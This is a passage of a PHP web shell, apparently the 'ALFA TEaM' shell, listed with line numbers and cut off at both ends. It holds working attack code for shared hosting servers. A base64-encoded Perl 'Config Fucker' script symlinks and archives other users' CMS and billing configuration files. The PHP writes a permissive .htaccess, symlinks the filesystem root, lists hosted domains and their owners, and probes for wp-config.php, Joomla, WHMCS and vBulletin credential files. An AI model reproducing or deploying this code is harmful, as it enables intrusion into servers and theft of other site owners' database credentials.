k7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLW5ldy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob21lL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS1ob21lLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3ZiL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictdmIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdmIzL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictdmIzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictaW5jbHVkZXMtdmIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd2htL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictd2htLWNlbnRyYWwudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd2htL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXdobS13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG0vV0hNQ1MvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXdobWMtV0hNLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHAudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2VjdXJlL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1Y3VyZS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZWN1cmUvd2htL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1Y3VyZS13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY3BhbmVsLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3BhbmVsL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictaG9zdC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob3N0aW5nL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RpbmcudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9zdHMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1Ym1pdHRpY2tldC5waHAnLCRrb2xhLictd2htY3MyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NsaWVudHMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NsaWVudGVzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWNsaWVudGVzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NsaWVudGUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY2xpZW50c3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9iaWxsaW5nL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWJpbGxpbmcudHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21hbmFnZS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9teS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG0tbXkudHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL215c2hvcC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG0tbXlzaG9wLnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRrb2xhLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRrb2xhLictc2hvcC16ZW5jYXJ0LnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zaG9wL2luY2x1ZGVzL2Rpc3QtY29uZmlndXJlLnBocCcsJGtvbGEuJy1zaG9wLVpDc2hvcC50eHQnKTsgDQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvU2V0dGluZ3MucGhwJywka29sYS4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc21mL1NldHRpbmdzLnBocCcsJGtvbGEuJy1zbWYyLnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9TZXR0aW5ncy5waHAnLCRrb2xhLictc21mLWZvcnVtLnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bXMvU2V0dGluZ3MucGhwJywka29sYS4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLXVwLnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC91cC9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLXVwMi50eHQnKTsgDQp9DQppZiAoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAnUE9TVCcpIHsNCiAgcmVhZChTVERJTiwgJGJ1ZmZlciwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7DQp9IGVsc2Ugew0KICAkYnVmZmVyID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQp9DQpAcGFpcnMgPSBzcGxpdCgvJi8sICRidWZmZXIpOw0KZm9yZWFjaCAkcGFpciAoQHBhaXJzKSB7DQogICgkbmFtZSwgJHZhbHVlKSA9IHNwbGl0KC89LywgJHBhaXIpOw0KICAkbmFtZSA9fiB0ci8rLyAvOw0KICAkbmFtZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkdmFsdWUgPX4gdHIvKy8gLzsNCiAgJHZhbHVlID1+IHMvJShbYS1mQS1GMC05XVthLWZBLUYwLTldKS9wYWNrKCJDIiwgaGV4KCQxKSkvZWc7DQogICRGT1JNeyRuYW1lfSA9ICR2YWx1ZTsNCn0NCmlmICgkRk9STXtwYXNzfSBlcSAiIil7DQpwcmludCAnDQo8Ym9keSBjbGFzcz0ic29sZXZpc2libGUiIGJnY29sb3I9IiMwMDAwMDAiPg0KPHA+U29sZXZpc2libGVbQUxGQSBURWFNXSBDb25maWcgRnVja2VyPC9wPg0KPHA+c29sZXZpc2libGVbYXRdZ21haWwuY29tPC9wPg0KPHNwYW4+PGZvbnQgY29sb3I9InJlZCI+bm90ZTo8L2ZvbnQ+IGVudGVyIHBhc3N3ZD0+IDxmb250IGNvbG9yPSIjRkZGRkZGIj5jYXQgL2V0Yy9wYXNzd2Q8L2ZvbnQ+PC9zcGFuPjxiciAvPg0KPGJyIC8+PGZvcm0gbWV0aG9kPSJwb3N0Ij48c3Ryb25nPg0KPHRleHRhcmVhIGlkPSJjaGVja291dHRleHRhcmVhIiBuYW1lPSJwYXNzIiBzdHlsZT0iYm9yZGVyOjNweCBkb3R0ZWQgI0ZGMDAwMDsgd2lkdGg6ICA0OThweDsgaGVpZ2h0OiAzNzBweDsgYmFja2dyb3VuZC1jb2xvcjojRkZGRkZGOyBmb250LWZhbWlseTpUYWhvbWE7IGZvbnQtc2l6ZTo5cHQ7IGNvbG9yOiBibGFjayIgID48L3RleHRhcmVhPjxiciAvPg0KJm5ic3A7PHA+DQo8aW5wdXQgbmFtZT0idGFyIiB0eXBlPSJ0ZXh0IiBzdHlsZT0iYm9yZGVyOjNweCBkb3R0ZWQgI0ZGMDAwMDsgd2lkdGg6IDIxMnB4OyBiYWNrZ3JvdW5kLWNvbG9yOiNGRkZGRkY7IGZvbnQtZmFtaWx5OlRhaG9tYTsgZm9udC1zaXplOjhwdDsgY29sb3I6YmxhY2s7ICIgIC8+PGJyIC8+DQombmJzcDs8L3A+DQo8cD4NCjxpbnB1dCBuYW1lPSJTdWJtaXQxIiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJDb25maWcgR2V0IiBzdHlsZT0iYm9yZGVyOjNweCBkb3R0ZWQgI0ZGMDAwMDsgd2lkdGg6IDk5OyBmb250LWZhbWlseTpUYWhvbWE7IGZvbnQtc2l6ZToxMHB0OyBjb2xvcjogYmxhY2s7IHRleHQtdHJhbnNmb3JtOnVwcGVyY2FzZTsgaGVpZ2h0OjIzOyBiYWNrZ3JvdW5kLWNvbG9yOiNGRkZGRkY7IiAvPjwvcD4NCjwvZm9ybT48L3N0cm9uZz4NCic7DQp9ZWxzZXsNCkBsaW5lcyA9PCRGT1JNe3Bhc3N9PjsNCiR5ID0gQGxpbmVzOw0Kb3BlbiAoTVlGSUxFLCAiPnRhci50bXAiKTsNCnByaW50IE1ZRklMRSAidGFyIC1jemYgIi4kRk9STXt0YXJ9LiIudGFyICI7DQpmb3IgKCRrYT0wOyRrYTwkeTska2ErKyl7DQp3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiZsaWwoJDEpOw0KcHJpbnQgTVlGSUxFICQxLiIudHh0ICI7DQpmb3IoJGtkPTE7JGtkPDE4OyRrZCsrKXsNCnByaW50IE1ZRklMRSAkMS4ka2QuIi50eHQgIjsNCn0NCn0NCiB9DQpwcmludCc8Ym9keSBjbGFzcz0ic29sZXZpc2libGUiIGJnY29sb3I9IiMwMDAwMDAiPg0KPGgyPmNvbXBsZXRlZCA6KTwvaDI+DQo8cD4mbmJzcDs8L3A+JzsNCmlmKCRGT1JNe3Rhcn0gbmUgIiIpew0Kb3BlbihJTkZPLCAidGFyLnRtcCIpOw0KQGxpbmVzID08SU5GTz4gOw0KY2xvc2UoSU5GTyk7DQpzeXN0ZW0oQGxpbmVzKTsNCnByaW50JzxwPjxhIGhyZWY9IicuJEZPUk17dGFyfS4nLnRhciI+PGZvbnQgY29sb3I9IiMwMEZGMDAiPg0KPHNwYW4gc3R5bGU9InRleHQtZGVjb3JhdGlvbjogbm9uZSI+Q2xpY2sgSGVyZSBUbyBEb3dubG9hZCBUYXIgRmlsZTwvc3Bhbj48L2ZvbnQ+PC9hPjwvcD4nOw0KfQ0KfQ0KIHByaW50Ig0KPC9ib2R5Pg0KPC9odG1sPiI7';
2317. $solevisible1 = fopen('config.alfa','w+');
2318. $solevisible2 = fwrite ($solevisible1 ,base64_decode($solevisible3));
2319. fclose($solevisible1);
2320. chmod('config.alfa',0755);
2321. echo "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br>";
2322. echo '<iframe src=alfaconfig/config.alfa width=100% height=600px frameborder=0></iframe> ';
2323. }
2324. if(isset($_POST['alfa4']) && $_POST['alfa4']=='SymFile')
2325. {
2326. echo '
2327. <script>alfa1_=alfa2_=alfa3_=alfa4_=alfa5_=alfa6_=alfa7_=alfa8_="";</script>
2328. <center>
2329. <pre id="strOutput" style="margin-top:5px" class="ml1"></pre><br>
2330. <form onSubmit="g(\'symlink\',null,null,null,null,\'SymFile\',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">
2331. <b><big><font color="#FFFF01" >==</font> <font color="#00A220">Symlink</font> <font color="#FFFFFF">File And</font><font color="#FF0000"> Directory</font><font color="#FFFF01"> ==</font></b></big><p>
2332. <input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br /><p>
2333. <input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/><br />
2334. <input type="submit" value=">>" name="symlink" />
2335. </form></center>
2336. ';
2337. @mkdir('sym',0777);
2338. $solevisible11 = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
2339. $solevisible10 =@fopen ('sym/.htaccess','w');
2340. fwrite($solevisible10 ,$solevisible11);
2341. $solevisible56 = $_POST['alfa5'];
2342. $solevisible57 = $_POST['alfa6'];
2343. $solevisible58 = $_POST['alfa7'];
2344. if ($solevisible58)
2345. {
2346. @symlink("$solevisible56","sym/$solevisible57");
2347. echo "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br>";
2348. echo '<center><b><font color="white">Click >> </font><a target="_blank" href="sym/'.$solevisible57.'" ><b><font size="4">'.$solevisible57.'</font></b></a></b></center><br>';
2349. }
2350. }
2351. if(isset($_POST['alfa1']) && $_POST['alfa1']=='website')
2352. {if(!@file_exists("/etc/virtual/domainowners")){
2353. echo "<center>";
2354. $d0mains = @file("/etc/named.conf");
2355. if(!$d0mains){ echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Cant access this file on server -> [ /etc/named.conf ]</b></font></pre></center>"; }
2356. echo "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><table align='center' width='40%' class='main' border='1'><td><font color=\"#00A220\"><b><center># Count</center></font></b></td><td><font color=\"#FFFFFF\"><b><center>Domains</center></font></b></td><td><font color=\"#FF0000\"><b><center>Users</center></font></b></td>";
2357. $count=1;
2358. foreach($d0mains as $d0main){
2359. if(@eregi("zone",$d0main)){
2360. preg_match_all('#zone "(.*)"#', $d0main, $domains);
2361. flush();
2362. if(strlen(trim($domains[1][0])) > 2){
2363. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2364. echo "<tr><td><b><font color=\"#00A220\">".$count."</b></font></td><td><a href=http://www.".$domains[1][0]."/><font color=\"#FFFFFF\"><b>".$domains[1][0]."</font></b></a></td><td><b><font color=\"#FF0000\">".$user['name']."</font></b></td></tr>";flush();
2365. $count++;
2366. }}}
2367. echo "</center></table>";
2368. }else{echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">This is Server DirectAdmin Please use </font><font color="#FF0000">Whole Symlink for DirectAdmin</font></b> ';}
2369. }
2370. if(isset($_POST['alfa2']) && $_POST['alfa2']=='whole')
2371. {
2372. if(!@file_exists("/etc/virtual/domainowners")){
2373. @set_time_limit(0);
2374. echo "<center>";
2375. @mkdir('sym',0777);
2376. $solevisible11 = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
2377. $solevisible10 =@fopen ('sym/.htaccess','w');
2378. fwrite($solevisible10 ,$solevisible11);
2379. @symlink('/','sym/root');
2380. $solevisible12 = basename('_FILE_');
2381. $solevisible9 = @file('/etc/named.conf');
2382. if(!$solevisible9)
2383. {
2384. echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Cant access this file on server -> [ /etc/named.conf ]</b></font></pre></center>";
2385. }
2386. else
2387. {
2388. echo "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br>";
2389. echo "<table align='center' width='40%' class='main' border='1'>
2390. <td><font color=\"#FFFF01\"><b><center># Count</center></font></b></td>
2391. <td><font color=\"#00A220\"><b><center>Domains</center></font></b></td>
2392. <td><font color=\"#FFFFFF\"><b><center>Users</center></font></b></td>
2393. <td><font color=\"#FF0000\"><b><center>symlink</center></font></b></td>";
2394. $count=1;
2395. foreach($solevisible9 as $solevisible13){
2396. if(@eregi('zone',$solevisible13)){
2397. preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
2398. flush();
2399. if(strlen(trim($solevisible14[1][0])) >2){
2400. $solevisible18 = posix_getpwuid(@fileowner('/etc/valiases/'.$solevisible14[1][0]));
2401. $solevisible21 = $solevisible18['name'];
2402. @symlink('/','sym/root');
2403. $solevisible21 = $solevisible14[1][0];
2404. $solevisible20 = '\.ir';
2405. $solevisible19 = '\.il';
2406. if (@eregi("$solevisible20",$solevisible14[1][0]) or @eregi("$solevisible19",$solevisible14[1][0]) ){
2407. $solevisible21 = "<b><font color=\"#00FFFF\">".$solevisible14[1][0].'</font></b>';}
2408. echo "<tr><td><font color=\"#FFFF01\">{$count}</font></td><td><a target='_blank' href=http://www.".$solevisible14[1][0].'/><font color=\"#00A220\"><b>'.$solevisible21.'</b> </a></font></td><td><font color="white"><b>'.$solevisible18['name']."</font></b></td><td><a href='sym/root/home/".$solevisible18['name']."/public_html' target='_blank'><font color=\"#FF0000\">symlink </font></a></td></tr>";flush();
2409. $count++;}}}}}else {echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">This is Server DirectAdmin Please use </font><font color="#FF0000">Whole Symlink for DirectAdmin</font></b> ';}
2410. echo "</center></table>";
2411. }
2412. if(isset($_POST['alfa6']) && $_POST['alfa6']=='direct')
2413. {
2414. if(@file_exists("/etc/virtual/domainowners")){
2415. @mkdir('sym',0777);
2416. $solevisible11 = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
2417. $solevisible10 =@fopen ('sym/.htaccess','w');
2418. fwrite($solevisible10 ,$solevisible11);
2419. @symlink('/','sym/root');
2420. fclose($solevisible10);
2421. $sole = @file("/etc/virtual/domainowners");
2422. $count=1;
2423. echo "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br>";
2424. echo "<table align='center' width='40%' class='main' border='1'>
2425. <td><font color=\"#FFFF01\"><b><center># Count</center></font></b></td>
2426. <td><font color=\"#00A220\"><b><center>Domains</center></font></b></td>
2427. <td><font color=\"#FFFFFF\"><b><center>Users</center></font></b></td>
2428. <td><font color=\"#FF0000\"><b><center>symlink</center></font></b></td>";
2429. foreach($sole as $visible){
2430. if(@eregi(":",$visible)){
2431. $solevisible = explode(':', $visible);
2432. echo "<tr><td><font color=\"#FFFF01\">{$count}</font></td><td><a target='_blank' href=http://www.".trim($solevisible[0]).'/><font color=\"#00A220\"><b>'.trim($solevisible[0]).'</b> </font></a></td><td><font color="white"><b>'.trim($solevisible[1])."</font></b></td><td><a href='sym/root/home/".trim($solevisible[1])."/public_html' target='_blank'><font color=\"#FF0000\">symlink </font></a></td></tr>";flush();
2433. $count++;}}echo "</table>";}else{echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">This is Server Cpanel Please use</font><font color="#FF0000"> Whole Symlink for Cpanel</font></b><br>';}}
2434. if(isset($_POST['alfa3']) && $_POST['alfa3']=='config')
2435. {
2436. echo "<center>";
2437. @mkdir('sym',0777);
2438. $solevisible11 = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
2439. $solevisible10 =@fopen ('sym/.htaccess','w');
2440. @fwrite($solevisible10 ,$solevisible11);
2441. @symlink('/','sym/root');
2442. $solevisible12 = basename('_FILE_');
2443. $solevisible9 = @file('/etc/named.conf');
2444. if(!$solevisible9)
2445. {
2446. echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Cant access this file on server -> [ /etc/named.conf ]</b></font></pre></center>";
2447. }
2448. else
2449. {
2450. echo "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br>
2451. <table align='center' width='40%' class='main' ><td><b><font color=\"#FFFFFF\"><center> Domains <b></font></center></td><td> <b><font color=\"#FFFFFF\">Script <b></font></center></td>";
2452. foreach($solevisible9 as $solevisible13){
2453. if(@eregi('zone',$solevisible13)){
2454. preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
2455. flush();
2456. if(strlen(trim($solevisible14[1][0])) >2){
2457. $solevisible18 = posix_getpwuid(@fileowner('/etc/valiases/'.$solevisible14[1][0]));
2458. $solevisible15=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/wp-config.php';
2459. $solevisible33=get_headers($solevisible15);
2460. $solevisible17=$solevisible33[0];
2461. $solevisible34=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/blog/wp-config.php';
2462. $solevisible35=get_headers($solevisible34);
2463. $solevisible36=$solevisible35[0];
2464. $solevisible37=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/configuration.php';
2465. $solevisible38=get_headers($solevisible37);
2466. $solevisible28=$solevisible38[0];
2467. $solevisible29=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/joomla/configuration.php';
2468. $solevisible30=get_headers($solevisible29);
2469. $solevisible27=$solevisible30[0];
2470. $solevisible31=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/includes/config.php';
2471. $solevisible32=get_headers($solevisible31);
2472. $solevisible26=$solevisible32[0];
2473. $solevisible25=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/vb/includes/config.php';
2474. $solevisible39=get_headers($solevisible25);
2475. $solevisible40=$solevisible39[0];
2476. $solevisible24=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/forum/includes/config.php';
2477. $solevisible23=get_headers($solevisible24);
2478. $solevisible22=$solevisible23[0];
2479. $solevisible41=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'public_html/clients/configuration.php';
2480. $solevisible42=get_headers($solevisible41);
2481. $solevisible43=$solevisible42[0];
2482. $solevisible44=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/support/configuration.php';
2483. $solevisible42=get_headers($solevisible44);
2484. $solevisible45=$solevisible42[0];
2485. $solevisible46=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/client/configuration.php';
2486. $solevisible47=get_headers($solevisible46);
2487. $solevisible48=$solevisible47[0];
2488. $solevisible49=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/submitticket.php';
2489. $solevisible50=get_headers($solevisible49);
2490. $solevisible51=$solevisible50[0];
2491. $solevisible52=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/client/configuration.php';
2492. $solevisible53=get_headers($solevisible52);
2493. $solevisible54=$solevisible53[0];
2494. $solevisible54 = strpos($solevisible17,'200');
2495. $solevisible16='&nbsp;';
2496. if (strpos($solevisible17,'200') == true )
2497. {
2498. $solevisible16="<a href='".$solevisible15."' target='_blank'>Wordpress</a>";
2499. }
2500. elseif (strpos($solevisible36,'200') == true)
2501. {
2502. $solevisible16="<a href='".$solevisible34."' target='_blank'>Wordpress</a>";
2503. }
2504. elseif (strpos($solevisible28,'200') == true and strpos($solevisible51,'200') == true )
2505. {
2506. $solevisible16=" <a href='".$solevisible49."' target='_blank'>WHMCS</a>";
2507. }
2508. elseif (strpos($solevisible45,'200') == true)
2509. {
2510. $solevisible16 =" <a href='".$solevisible44."' target='_blank'>WHMCS</a>";
2511. }
2512. elseif (strpos($solevisible48,'200') == true)
2513. {
2514. $solevisible16 =" <a href='".$solevisible46."' target='_blank'>WHMCS</a>";
2515. }
2516. elseif (strpos($solevisible28,'200') == true)
2517. {
2518. $solevisible16=" <a href='".$solevisible37."' target='_blank'>Joomla</a>";
2519. }
2520. elseif (strpos($solevisible27,'200') == true)
2521. {
2522. $solevisible16=" <a href='".$solevisible29."' target='_blank'>Joomla</a>";
2523. }
2524. elseif (strpos($solevisible26,'200') == true)
2525. {
2526. $solevisible16=" <a href='".$solevisible31."' target='_blank'>vBulletin</a>";
2527. }
2528. elseif (strpos($solevisible40,'200') == true)
2529. {
2530. $solevisible16=" <a href='".$solevisible25."' target='_blank'>vBulletin</a>";
2531. }
2532. elseif (strpos($solevisible22,'200') == true)
2533. {
2534. $solevisible16=" <a href='".$solevisible24."' target='_blank'>vBulletin</a>";
2535. }
2536. else
2537. {
2538. continue;
2539. }
2540. $solevisible21 = $solevisible18['name'] ;
2541. echo '<tr><td><a href=http://www.'.$solevisible14[1][0].'/>'.$solevisible14[1][0].'</a></td>
2542. <td>'.$solevisible16.'</td></tr>';flush();
2543. }
2544. }
2545. }
2546. }
2547. echo "</center></table>";
2548. }
2549. echo "</div>";
2550. alfafooter();
2551. }
2552. function alfasql()
2553. {
2554. class DbClass {
2555. var $type;
2556. var $link;
2557. var $res;
2558. function DbClass($type) {
2559. $this->type = $type;
2560. }
2561. function connect($host, $user, $pass, $dbname){
2562. switch($this->type) {
2563. case 'mysql':
2564. if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
2565. break;
2566. case 'pgsql':
2567. $host = explode(':', $host);
2568. if(!$host[1]) $host[1]=5432;
2569. if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
2570. break;
2571. }
2572. return false;
2573. }
2574. function selectdb($db) {
2575. switch($this->type) {
2576. case 'mysql':
2577. if (@mysql_select_db($db))return true;
2578. break;
2579. }
2580. return false;
2581. }
2582. function query($str) {
2583. switch($this->type) {
2584. case 'mysql':
2585. return $this->res = @mysql_query($str);
2586. break;
2587. case 'pgsql':
2588. return $this->res = @pg_query($this->link,$str);
2589. break;
2590. }
2591. return false;
2592. }
2593. function fetch() {
2594. $res = func_num_args()?func_get_arg(0):$this->res;
2595. switch($this->type) {
2596. case 'mysql':
2597. return @mysql_fetch_assoc($res);
2598. break;
2599. case 'pgsql':
2600. return @pg_fetch_assoc($res);
2601. break;
2602. }
2603. return false;
2604. }
2605. function listDbs() {
2606. switch($this->type) {
2607. case 'mysql':
2608. return $this->query("SHOW databases");
2609. break;
2610. case 'pgsql':
2611. return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
2612. break;
2613. }
2614. return false;
2615. }
2616. function listTables() {
2617. switch($this->type) {
2618. case 'mysql':
2619. return $this->res = $this->query('SHOW TABLES');
2620. break;
2621. case 'pgsql':
2622. return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
2623. break;
2624. }
2625. return false;
2626. }
2627. function error() {
2628. switch($this->type) {
2629. case 'mysql':
2630. return @mysql_error();
2631. break;
2632. case 'pgsql':
2633. return @pg_last_error();
2634. break;
2635. }
2636. return false;
